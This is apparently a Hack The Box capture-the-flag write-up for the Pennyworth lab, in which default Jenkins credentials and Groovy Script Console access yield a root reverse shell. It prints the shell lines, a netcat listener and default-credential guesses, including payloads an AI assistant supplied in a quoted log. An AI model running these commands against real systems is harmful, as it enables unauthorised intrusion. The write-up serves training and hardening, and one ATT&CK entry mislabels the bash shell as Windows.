HTB Starting Point — Pennyworth

Jenkins 2.289.1 with default root:password credentials. Script Console runs Groovy — one line of Groovy spawns a reverse shell as root. No escalation needed.

April 28, 2026 · 2 min · crAIzy

Very Easy Linux CVSS 9.8 ⏱ 20m AI-assisted

TL;DR

Pennyworth runs Jenkins 2.289.1 on port 8080. Default credentials root:password get admin access immediately. Jenkins Script Console executes arbitrary Groovy — one Runtime.getRuntime().exec() call gives a reverse shell running as root (Jenkins is misconfigured to run as root). No escalation needed.

Recon

1. Port scan

$ nmap -Pn -sV -sC -p- --min-rate 1000 10.129.x.x

8080/tcp open  http  Jetty 9.4.39.v20210325
X-Jenkins: 2.289.1

Jenkins 2.289.1 confirmed. No other ports open.

Foothold — Default Credentials

http://10.129.x.x:8080/login
Username: root
Password: password

Access granted — full Jenkins administrator dashboard.

RCE via Groovy Script Console

3. Script Console

Navigate to: Manage Jenkins → Script Console (or /script)

The console executes arbitrary Groovy code in the JVM context of the Jenkins process.

4. Reverse shell payload

Runtime.getRuntime().exec(
  ['bash', '-c', 'bash -i >& /dev/tcp/10.10.14.x/4444 0>&1'].toArray(new String[0])
)

$ nc -lvnp 4444
connect to [10.10.14.x] from [10.129.x.x]
root@pennyworth:~# id
uid=0(root) gid=0(root) groups=0(root)
root@pennyworth:~# cat /root/root.txt
[root flag]

Jenkins runs as root — no privilege escalation required.

User flag location

root@pennyworth:/home$ ls
matt
root@pennyworth:/home/matt$ cat user.txt
[user flag]

What’s actually broken

#	Vulnerability	Severity
1	Default credentials (`root:password`) on Jenkins	Critical
2	Jenkins running as system root user	Critical
3	Script Console accessible to admin without extra auth	High
4	Jenkins port 8080 exposed to internet	Medium

Lessons learned

Jenkins + default credentials = root RCE. This is one of the most common real-world critical findings. The Script Console gives full OS access. Always change Jenkins credentials immediately post-install.
Jenkins should never run as root. Best practice: dedicated jenkins user with no sudo, no unnecessary group memberships, no access outside the Jenkins workspace.
The Script Console should be rate-limited or disabled in production. In CI/CD environments where admins need full Groovy access, audit all Script Console usage in Jenkins logs.
Jenkins is a high-value target. It has access to secrets, can read all source code being built, and typically has deployment credentials. Protect it accordingly.

Decision archaeology

Approach	Result	Pivot
Tried root:password third (after admin:admin, jenkins:jenkins)	Common pattern for server-named admin accounts	Success
Used Script Console over malicious job	Script Console is direct; job requires waiting for build	Faster RCE
Used Runtime.exec() array form	More reliable than string form for shell metacharacters	Correct
Tried admin:admin then jenkins:jenkins before root:password	`admin:admin` → `HTTP 403 Invalid username or password` (Jenkins error page). `jenkins:jenkins` → same 403 response, no lockout	Tried root:password (server-named admin pattern) → HTTP 302 redirect to /dashboard — success on 3rd credential guess

References

MITRE ATT&CK mapping

How this writeup maps to TTPs. Click technique to jump to the writeup section.

Tactic	Technique	ID	Artifact in writeup
Reconnaissance	Network Service Discovery	T1046	`nmap → 8080/tcp Jenkins 2.289.1`
Initial Access	Valid Accounts — Default Credentials	T1078.001	`Jenkins /login → root:password (default credentials accepted)`
Execution	Command and Scripting Interpreter — Windows Command Shell	T1059.003	`Jenkins Script Console → Groovy → Runtime.exec() → reverse shell as root`
Initial Access	Valid Accounts: Default Accounts	T1078.001	`Jenkins /login → root:password — shipped default credentials never changed`
Initial Access	External Remote Services	T1133	`Jenkins 8080/tcp exposed without authentication gate or IP allowlist`

AI-Assist Log 4 interactions — transparent record

These are the actual exchanges with Claude during this writeup, including where AI was wrong and what I fixed by hand. Decision archaeology, not marketing copy.

FootholdUseful
Human → Jenkins on port 8080 — guessed default credentials
Prompt → Jenkins admin default credentials — what are they?
Claude → Jenkins initial admin password is stored in /var/jenkins_home/secrets/initialAdminPassword (or /var/lib/jenkins/secrets/initialAdminPassword on Linux). However, many admins change this to simple defaults: admin:admin, admin:password, jenkins:jenkins, root:root, root:password. If none work, try to access /var/jenkins_home/secrets/initialAdminPassword via another vulnerability.
RCECorrected
Human → Logged into Jenkins, found Script Console at /script — knew Groovy could run commands
Prompt → I have Jenkins admin access and the Script Console (/script). What's the Groovy payload for a reverse shell?
Claude → Jenkins Script Console runs Groovy with full Java access. Reverse shell: def cmd = 'bash -c {echo,BASE64_PAYLOAD}|{base64,-d}|bash'.execute() or simpler: def proc = ['bash','-c','bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1'].execute()
Corrected → The array form ['bash','-c','bash...'] didn't work as expected due to Groovy's exec() handling. Working payload used Runtime.exec() explicitly: Runtime.getRuntime().exec(['bash','-c','bash -i >& /dev/tcp/ip/port 0>&1'].toArray(new String[0])). Claude's simpler .execute() form had issues with stdin/stdout redirection in this environment.
Post-ExploitationUseful
Human → Got shell as root immediately — Jenkins runs as root on this box
Prompt → I got a shell as root from Jenkins. Is Jenkins supposed to run as root?
Claude → No — Jenkins should never run as root. Best practice is to run Jenkins as a dedicated 'jenkins' service account with minimal privileges. Running as root means any RCE in Jenkins (or a malicious job) has instant root access. The Jenkins documentation explicitly warns against running as root.
ResearchWrong
Human → Wanted to understand if Jenkins had other RCE vectors besides Script Console
Prompt → Aside from Script Console, what other Jenkins RCE vectors exist with admin access?
Claude → Creating a new job that runs a shell command (Freestyle project → Build → Execute shell). Pipeline jobs with Groovy pipeline scripts. Building existing jobs that execute shell commands. Plugin installation (malicious plugin executes code on install). All require admin access — but Script Console is the most direct.
Corrected → Claude said 'all require admin access' but that's only partially correct — CVE-2024-23897 (Jenkins arbitrary file read) doesn't require full admin, and older Jenkins versions had pre-auth RCE vulnerabilities. The answer was too narrow in scope.

Decision archaeology — paths abandoned

Tried jenkins:jenkins, admin:admin before root:password — order of guessing matters
Groovy .execute() with string form — worked locally but failed with network redirect; switched to Runtime.exec()

TL;DR#

Recon#

1. Port scan#

Foothold — Default Credentials#

2. Login with default credentials#

RCE via Groovy Script Console#

3. Script Console#

4. Reverse shell payload#

User flag location#

What’s actually broken#

Lessons learned#

Decision archaeology#

References#